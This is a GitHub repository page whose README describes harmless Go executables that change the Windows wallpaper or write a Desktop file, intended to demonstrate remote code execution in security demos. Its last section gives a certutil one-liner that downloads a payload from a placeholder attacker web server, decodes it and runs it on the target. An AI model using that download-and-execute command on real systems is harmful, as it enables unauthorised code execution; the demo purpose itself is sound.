https://github.com/ariary/friendly-windows-malware
💻🎨 Simple executables to prove remote code execution in a nice and harmless way in your demos
https://github.com/ariary/friendly-windows-malware
fun golang proof-of-concept windows
Last synced: 5 months ago
JSON representation
💻🎨 Simple executables to prove remote code execution in a nice and harmless way in your demos
- Host: GitHub
- URL: https://github.com/ariary/friendly-windows-malware
- Owner: ariary
- Created: 2022-06-22T15:25:54.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2022-06-23T12:02:58.000Z (about 4 years ago)
- Last Synced: 2025-07-11T22:25:24.548Z (12 months ago)
- Topics: fun, golang, proof-of-concept, windows
- Language: Go
- Homepage:
- Size: 8.84 MB
- Stars: 2
- Watchers: 2
- Forks: 2
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## "Magic" and visual proof
|Write file on Desktop and change wallpaper when file is opened/deleted/modified|
|:---:|
||
***Build:***
```shell
make build.youhou
# Choose the fruit, or make the victim choosing
```
***Execution:***
```cmd.exe
.\youhou.exe
```
## Change wallpaper *(with the fruit of your choixe)*
***Build:***
```shell
make build.fruity-wallpaper
# Choose the fruit, or make the victim choosing
```
***Execution:***
```cmd.exe
.\fruity-wallpaper.exe
```
*Could take a little time as it will fetch big image*
## Write file on Desktop
***Build:***
```shell
make build.desktop-writer
```
***Execution:***
```cmd.exe
.\desktop-writer.exe
```
*Change `pkg/desktop/desktop.go` to custom the file content*
## 💡RCE to executable execution one-liner
On attacker:
```shell
base64 -w0 youhou.exe > youhou.b64
```
The RCE on target:
```powershell
certutil -urlcache -split -f https://[ATTACKER_WEBSERVER]/youhou.b64 & certutil -decode youhou.b64 youhou.exe & youhou.exe
```
See more ideas [here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)